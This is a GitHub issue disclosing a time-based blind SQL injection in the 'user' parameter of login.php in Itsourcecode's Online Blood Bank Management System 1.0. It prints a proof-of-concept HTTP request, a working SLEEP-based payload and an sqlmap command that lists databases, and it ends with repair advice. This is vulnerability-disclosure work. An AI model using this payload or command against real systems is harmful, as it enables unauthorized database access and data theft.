Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "login.php" SQL injection #1

Open
HermesCui opened this issue Jul 21, 2024 · 0 comments
Assignees

Comments

@HermesCui
Copy link
Owner

HermesCui commented Jul 21, 2024

Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "login.php" SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Online Blood Bank Management System" in PHP

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • HermesCui (Chihan Cui)

Vulnerable File

  • login.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was identified in the 'login.php' file of the 'Online Blood Bank Management System' project developed in PHP. The root cause of this issue is that malicious code can be injected through the "user" parameter, which is then directly used in SQL queries without proper sanitization or validation. This flaw permits attackers to manipulate input values, consequently altering SQL queries and executing unauthorized operations.

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • Due to insufficient user input validation for the "user" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Online Blood Bank Management System" in PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability details and POC

POST /login.php HTTP/1.1
Host: 192.168.0.103:1225
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://192.168.0.103:1225
Connection: close
Referer: http://192.168.0.103:1225/login.php
Cookie: pma_lang=zh_CN; PHPSESSID=imr8rmlkh54u26vchbpf2b5qd1; phpMyAdmin=rj6mrnt4lq34hn658uongmp9qr; pmaUser-1=%7B%22iv%22%3A%22qjTt6oOV5NEWSxwBInV2Lg%3D%3D%22%2C%22mac%22%3A%225c7fe56108a609c4cb6eac0da8509b77d0cad421%22%2C%22payload%22%3A%22iTXdHC2Lk%2BINU6DFUtD%2Bcg%3D%3D%22%7D
Upgrade-Insecure-Requests: 1
Priority: u=0, i

tab=on&user=123321&pass=123123&sub=Log+In

Vulnerability type:

  • time-based blind

Vulnerability location:

  • 'user' parameter

Payload:

Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: tab=on&user=123321' AND (SELECT 8755 FROM (SELECT(SLEEP(5)))xGkg) AND 'emTj'='emTj&pass=123123&sub=Log In

2

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

sqlmap -r 123 --batch --dbs

3

Suggested repair

  1. Use prepared statements and parameter binding:
    Utilizing prepared statements can effectively prevent SQL injection by isolating SQL code from user input. This ensures that user-provided values are handled strictly as data, not executable SQL commands.

  2. Input validation and filtering:
    Enforce strict validation and filtering of user input to guarantee it adheres to the expected format and standards.

  3. Minimize database user permissions:
    Configure database accounts to have only the necessary permissions needed for their tasks. Refrain from using highly privileged accounts (like 'root' or 'admin') for routine operations.

  4. Regular security audits:
    Conduct frequent code and system security audits to quickly identify and rectify any potential security vulnerabilities.

Citation: Follow same issue format from ppp-src/ha#3

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant